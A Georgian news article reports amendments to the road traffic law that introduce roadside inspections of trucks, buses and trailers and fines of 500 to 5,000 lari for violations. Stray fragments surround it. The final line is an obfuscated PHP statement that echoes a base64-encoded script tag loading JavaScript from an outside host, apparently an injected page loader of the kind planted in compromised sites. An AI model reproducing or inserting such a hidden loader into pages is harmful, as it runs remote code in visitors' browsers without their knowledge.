celsiusi
ავერსი შნაიდერი

 გზისპირა ზონებში გადამზიდველების საგზაო ინსპექტირება განხორციელდება. შესაბამისი ცვლილებები „საგზაო მოძრაობის შესახებ“ კანონში შედის.

კანონპროექტის მიხედვით, სახმელეთო ტრანსპორტის სააგენტოს უფლებამოსილი პირების მიერ ინსპექტირებას M2, M3, N1, N2, N3, O3, O4 კატეგორიის სატრანსპორტო საშუალებები დაექვემდებარება.

ავტოსატრანსპორტო საშუალებები გზისპირა ზონებში შემდეგ მონაცემებზე შემოწმდება: სახიფათო ტვირთების გადაზიდვის წესების დაცვა; მძღოლის შრომისა და დასვენების რეჟიმის დაცვა და ტაქოგრაფის ელექტრონული ბარათის გამოყენების შემოწმება; სატრანსპორტო საშუალების ტექნიკური გამართულობა; სატრანსპორტო საშუალების მასა და გაბარიტები; ტვირთის ძარაზე დამაგრების წესების დაცვა; საერთაშორისო გადაყვანა-გადაზიდვისთან დაკავშირებით შესაბამისი სანებართვო დოკუმენტის გამოყენების წესების დაცვა; ტაქოგრაფის და სიჩქარის შემზღუდველი მოწყობილობის მონტაჟისა და კალიბრაციის წესების დაცვა.

გზისპირა ზონებში სატრანსპორტო საშუალებების შემოწმება სახმელეთო ტრანსპორტის სააგენტოს მიერ შს სამინისტროსთან კოორდინაციის გზით განხორციელდება.

ამასთან, ცვლილებებით, სახიფათო ტვირთების გადაზიდვის წესების, მძღოლთა შრომისა და დასვენების რეჟიმების და ტაქოგრაფის ელექტრონული ბარათის გამოყენების, სატრანსპორტო საშუალების ტექნიკური გამართულობის და ტვირთის ძარაზე დამაგრების წესების, საერთაშორისო გადაყვანა-გადაზიდვასთან დაკავშირებით შესაბამისი სანებართვო დოკუმენტის გამოყენების წესების, ტაქოგრაფის და სიჩქარის შემზღუდველი მოწყობილობის მონტაჟისა და კალიბრაციის წესების დარღვევა პირველ, მეორე და მესამე ხარისხის დარღვევად დაიყოფა – აღნიშნული დარღვევის სახეები კი, მთავრობის ნორმატიული აქტით განისაზღვრება.

გათვალისწინებულია ჯარიმებიც. კერძოდ, მონიტორინგის შედეგად გამოვლენილ დარღვევაზე განისაზღვრება ადმინისტრაციული პასუხისმგებლობა, დარღვევის ხარისხის შესაბამისად – 500 ლარიდან 5 000 ლარის ოდენობით.

176
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");